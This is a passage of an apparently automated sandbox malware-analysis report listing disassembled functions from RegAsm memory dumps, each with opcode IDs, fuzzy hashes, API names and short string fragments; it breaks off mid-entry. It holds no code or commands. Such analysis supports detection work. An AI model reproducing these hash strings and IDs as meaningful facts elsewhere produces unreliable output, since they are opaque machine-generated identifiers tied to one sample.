                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                            • Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
                                                            • Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                            • Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96
                                                            Function 00415220 Relevance: .4, Instructions: 436COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                            • Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
                                                            • Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                            • Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A
                                                            Function 00426B95 Relevance: .4, Instructions: 356COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                                            • Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
                                                            • Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                                            • Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9
                                                            Function 0043F330 Relevance: .3, Instructions: 349COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                                            • Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
                                                            • Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                                            • Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785
                                                            Function 00422190 Relevance: .3, Instructions: 330COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                            • Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
                                                            • Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                            • Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A
                                                            Function 0043EFB0 Relevance: .3, Instructions: 320COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                                            • Instruction ID: 3187122ed07642cbe4dcf9e03264eeaa439871456ea8a6719abbd84e200541cd
                                                            • Opcode Fuzzy Hash: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                                            • Instruction Fuzzy Hash: 4EA11436A043018BC718DF28D99092BB3F2EBC9710F1A957DE9869B365EB35DC05CB46
                                                            Function 00429C2B Relevance: .3, Instructions: 298COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                                            • Instruction ID: 89cd8c3f6ac805753dcfa7ea52abb159a623b373aaffce4ab273b97bd3830c78
                                                            • Opcode Fuzzy Hash: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                                            • Instruction Fuzzy Hash: CFB10575608790DFD714DF24E891A2BB7E2EF8A314F488A6DF0D5872A2D7388905CB16
                                                            Function 0043ECA0 Relevance: .3, Instructions: 272COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                            • Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
                                                            • Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                            • Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785
                                                            Function 0043AEC0 Relevance: .2, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
                                                            • Instruction ID: ba880319810bdb8e213e259538359e713a98a4b2945b2457ae3d4c78796ecc2a
                                                            • Opcode Fuzzy Hash: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
                                                            • Instruction Fuzzy Hash: 47512A357043008FE7188F28C89577BB7E2EB9A320F18A62ED5D597392D7389C41C78A
                                                            Function 004385E0 Relevance: .2, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
                                                            • Instruction ID: 19c9bc1ea9186e56c23c5e66cc144f5345884b6a785bfb5c303e44cb60fc86fa
                                                            • Opcode Fuzzy Hash: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
                                                            • Instruction Fuzzy Hash: 915126746083009BE7109F29DC45B2BB7E6EB89704F14982DF5C597292DB39DC05CBAB
                                                            Function 00425E70 Relevance: .2, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
                                                            • Instruction ID: 6e37d88637f30dcf1ca5a39760ca9fc235c391d288c19f204446c63a880f3ae7
                                                            • Opcode Fuzzy Hash: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
                                                            • Instruction Fuzzy Hash: 0951AE30B483648FD710DA28A480267BBD2DF95320F8A867ED4D44B3D6E67DD90DD389
                                                            Function 00430C70 Relevance: .1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6719c340687af9c7671d69fd13b02110751ddfc4bfd7c22202d719cfaa6f9092
                                                            • Instruction ID: f5f621b67306c00f1b1f1892e0c4b111cdc11732c84e43f9357b9df5953cc386
                                                            • Opcode Fuzzy Hash: 6719c340687af9c7671d69fd13b02110751ddfc4bfd7c22202d719cfaa6f9092
                                                            • Instruction Fuzzy Hash: 3E7160B840AB848FE774DF04D45868ABBE0FB8A358F52991ED48C47311C7B92448CF9B
                                                            Function 0041BF14 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
                                                            • Instruction ID: 2e66319cfaede8187dee7502eb2bdf6532bbee011b37898b3e62ff9ec94ea10c
                                                            • Opcode Fuzzy Hash: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
                                                            • Instruction Fuzzy Hash: 2C1166324092905AC314CB289940737BBE19B87310F584A5DF4D6E32E1D728CC028B8A
                                                            Function 00435450 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                            • Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                            • Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359
                                                            Function 0042A700 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                            • Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
                                                            • Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                            • Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E
                                                            Function 00428D93 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                                            • Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
                                                            • Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                                            • Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95
                                                            Function 0043CA93 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                                            • Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
                                                            • Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                                            • Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8
                                                            Function 00423086 Relevance: .0, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                                            • Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
                                                            • Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                                            • Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D
                                                            Function 00427AD3 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                            • Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
                                                            • Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
                                                            • Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E
                                                            Function 0041C653 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                            • Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
                                                            • Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
                                                            • Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E
                                                            Function 0040BFFD Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                            • Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
                                                            • Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
                                                            • Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C
                                                            Function 0042984F Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                            • Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
                                                            • Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
                                                            • Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E
                                                            Function 00431715 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: AllocString
                                                            • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                            • API String ID: 2525500382-534244583
                                                            • Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                            • Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
                                                            • Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
                                                            • Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767
                                                            Function 004312D1 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: AllocString
                                                            • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                            • API String ID: 2525500382-534244583
                                                            • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                            • Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
                                                            • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                            • Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                            Function 0042E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit
                                                            • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                            • API String ID: 2610073882-1095711290
                                                            • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                            • Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
                                                            • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                            • Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
                                                            Function 0042F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit
                                                            • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                            • API String ID: 2610073882-1095711290
                                                            • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                            • Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
                                                            • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                            • Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
                                                            Function 00432409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitVariant
                                                            • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                            • API String ID: 1927566239-3011065302
                                                            • Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                            • Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
                                                            • Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                            • Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757
                                                            Function 00432194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitVariant
                                                            • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                            • API String ID: 1927566239-3011065302
                                                            • Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                            • Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
                                                            • Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                            • Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757
                                                            Function 00431EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit
                                                            • String ID: A$e$e$n$p$p$v$w$z$z
                                                            • API String ID: 2610073882-1114116150
                                                            • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                            • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                                            • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                            • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763
                                                            Function 0040B390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: Wu
                                                            • API String ID: 3664257935-4083010176
                                                            • Opcode ID: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                                            • Instruction ID: 023303e962689a797e65a05037f9f777abe5289ef5a5f996be967a955c3fa6a7
                                                            • Opcode Fuzzy Hash: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                                            • Instruction Fuzzy Hash: DFC002BA818001AFCE016B61FC198187A23BB563067A809B4F80941536EB624D2BDA1E

                                                            Non-executed Functions

                                                            Function 010ED152 Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1807822091.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_10ed000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bd2a8aed51903590841aaa6608af5471edb584ac01b6c2812ddfbec0ebf171c6
                                                            • Instruction ID: 251ab9eb883b8b44cde9b523826c11e7dee5ab064134e517a57d56eddfe25639
                                                            • Opcode Fuzzy Hash: bd2a8aed51903590841aaa6608af5471edb584ac01b6c2812ddfbec0ebf171c6
                                                            • Instruction Fuzzy Hash: 1F21C02144E3C19FD3038BB988296947FF0AF13214B1E45EFC5C8CF0A3D659895AD766
                                                            Function 010FCFBA Relevance: .0, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1807822091.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, Offset: 010F7000, based on PE: false
                                                            Joe Sandbox IDA Plugin
